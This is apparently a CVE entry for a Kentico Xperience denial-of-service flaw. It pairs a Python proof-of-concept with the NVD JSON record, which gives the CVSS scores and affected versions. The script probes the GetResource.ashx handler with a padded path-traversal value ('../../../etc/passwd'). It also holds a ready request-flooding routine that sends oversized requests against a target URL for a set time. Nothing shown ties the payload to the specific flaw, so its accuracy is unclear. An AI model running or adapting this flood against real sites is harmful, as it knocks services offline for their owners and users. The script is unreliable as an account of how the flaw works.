CVE-2023-53934

import requests import time import sys # CVE-2023-53934 PoC - Kentico Xperience GetResource DoS # Target: Kentico Xperience GetResource handler # Note: For authorized security testing only def check_vulnerability(target_url): """Check if target is vulnerable to CVE-2023-53934""" headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/x-www-form-urlencoded' } # Crafted payload that triggers DoS condition # The GetResource handler processes this specially crafted request params = { 'resource': '../../../etc/passwd' + 'A' * 10000, 'hash': '' } try: print(f'[*] Testing target: {target_url}') response = requests.get( f'{target_url}/CMSPages/GetResource.ashx', params=params, headers=headers, timeout=10 ) print(f'[+] Response status: {response.status_code}') return response.status_code != 0 except requests.exceptions.Timeout: print('[!] Request timeout - target may be vulnerable or blocked') return True except Exception as e: print(f'[-] Error: {str(e)}') return False def dos_attack(target_url, duration=30): """Perform DoS attack demonstration""" print(f'[*] Starting DoS attack for {duration} seconds') end_time = time.time() + duration request_count = 0 while time.time() < end_time: try: params = { 'resource': 'A' * 50000, 'cacheminutes': 0 } requests.get( f'{target_url}/CMSPages/GetResource.ashx', params=params, timeout=5 ) request_count += 1 if request_count % 10 == 0: print(f'[*] Sent {request_count} requests') except: pass print(f'[+] Attack completed. Sent {request_count} requests') if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve-2023-53934.py <target_url>') sys.exit(1) target = sys.argv[1] check_vulnerability(target)

{"cve": {"id": "CVE-2023-53934", "sourceIdentifier": "[email protected]", "published": "2025-12-18T20:15:51.530", "lastModified": "2025-12-24T17:01:50.553", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A denial of service vulnerability in Kentico Xperience allows attackers to launch DoS attacks via specially crafted requests to the GetResource handler. Improper input validation enables remote attackers to potentially disrupt service availability through maliciously constructed requests."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-97"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kentico:xperience:*:*:*:*:*:*:*:*", "versionEndIncluding": "12.0.98", "matchCriteriaId": "80D6B910-726B-47FE-BCFA-3AAF96969B34"}]}]}], "references": [{"url": "https://devnet.kentico.com/download/hotfixes", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/kentico-xperience-getresource-handler-denial-of-service", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}